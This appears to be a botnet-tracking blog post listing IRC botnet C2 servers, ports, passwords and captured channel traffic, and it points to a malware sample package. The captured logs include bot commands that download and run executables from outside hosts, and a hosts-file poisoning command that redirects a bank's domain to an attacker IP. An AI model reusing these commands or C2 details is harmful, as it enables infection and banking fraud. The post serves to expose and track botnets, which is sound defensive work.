93.95.99.87 (IRC botnet hosted in Russian Federation, Moscow, JSC Mediasoft Ekspert)

Remote Host      Port Number
93.95.99.87      1866

NICK n[USA|XP|COMPUTERNAME]pxzflri
USER hh "" "lol" :hh
Now talking in #!h!
Modes On: [ #!h! ] [ +smntu ]
.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/

Hosting info: http://whois.domaintools.com/93.95.99.87

irc.r00t.me.uk (gBot hosted in Seychelles, Ideal Solution Ltd)

Remote Host      Port Number
irc.r00t.me.uk   7007

PASS gBot
NICK n{USA|XP}eqqcbip
USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip

I don't have the exe to find more info, so try to find the channels yourself. This botnet is from the same guy as here: http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html

Hosting info: http://whois.domaintools.com/193.107.16.113

60.190.223.42 (IRC botnet hosted in China, Zhejiang, Ninbo Lanzhong Network Ltd)

Remote Host      Port Number
199.15.234.7     80
70.38.98.236     80
70.38.98.237     80
60.190.223.42    5101

PASS hax0r
PRIVMSG #US! :[d="http://img102.herosh.com/2012/01/14/551459105.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/14/594572320.gif" s="61440 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/04/210592960.gif" s="27648 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp"

union-foros.com (IRC botnet hosted in Seychelles, Ideal Solution Ltd)

Remote Host      Port Number
193.107.19.60    1863

NICK {XPUSA919273}
JOIN #per
PRIVMSG #per : 14,1. 15:: [HOST] adido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%\system32\drivers\etc\hosts 3,1 echo 69.64.58.90 viabcp.com >> %windir%\system32\drivers\etc\hosts
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA919273} -ix
Now talking in #per
Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ]
Topic

The channel topic makes every bot append two entries to the Windows hosts file, so on infected machines www.viabcp.com and viabcp.com resolve to 69.64.58.90 instead of the bank's real servers.

d.xludakx.com (ngrBot hosted in Netherlands, Amsterdam, Leaseweb B.V.)

This ngrBot botnet connects to 3 domains and is approximately 100k in size:

Resolved : [d.xludakx.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [178.33.143.52]
Resolved : [ab.0n3mmm.com] To [109.75.176.231]
Resolved : [pusikuracbre.com] To [95.211.165.62]

Remote Host      Port Number
199.15.234.7     80
95.211.165.62    4949    PASS ngrBot
109.75.176.231   4949    PASS ngrBot
178.33.143.52    4949    PASS ngrBot
ab.0n3mmm.com +666

193.107.16.22 (IRC botnet hosted in Seychelles, Ideal Solution Ltd)

Server: 193.107.16.22:8718
Nick: pSLXmPY
User: wqvryekc
Channel: #c

Now talking in #c
Topic On: [ #c ] [ =dOgdsa09MhlSUc9X89Kr0zVOWZeVEgEv3wA1/TshQtxNUaWqoxiIxkURBNl9r/5JGhteretdAQXvU1kBsZEpDZNZJfkv ]
Topic By: [ r ]

Hosting info: http://whois.domaintools.com/193.107.16.22

80.79.112.66 (ngrBot hosted in Estonia, Tallinn, Aktsiaselts Wavecom)

Remote Host      Port Number
109.68.190.217   80
199.15.234.7     80
80.79.112.66     5749

PASS axplm2
NICK n{US|XPa}psbmdzo
USER psbmdzo 0 0 :psbmdzo
JOIN #chat Amx4k
PRIVMSG win7elite :[d="http://109.68.190.217/alms22.exe" s="150528 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0

Hosting info: http://whois.domaintools.com/80.79.112.66

67 MB Malware Samples

This package has a lot of IRC bot and banking trojan samples inside; have fun exploring the samples.

Virus.Win32.Nimnul.a (Malware hosted in United States, Network Operations Center Inc)

Hosted in the USA; also called Ramnit by other antivirus vendors. What this malware does:

Capability to send out email message(s) with the built-in SMTP client engine.
Produces outbound traffic.
Communication with a remote SMTP server and sending out email.
Downloads/requests other files from the Internet.
Compromises SafeBoot registry key(s) in an attempt to disable Safe Mode.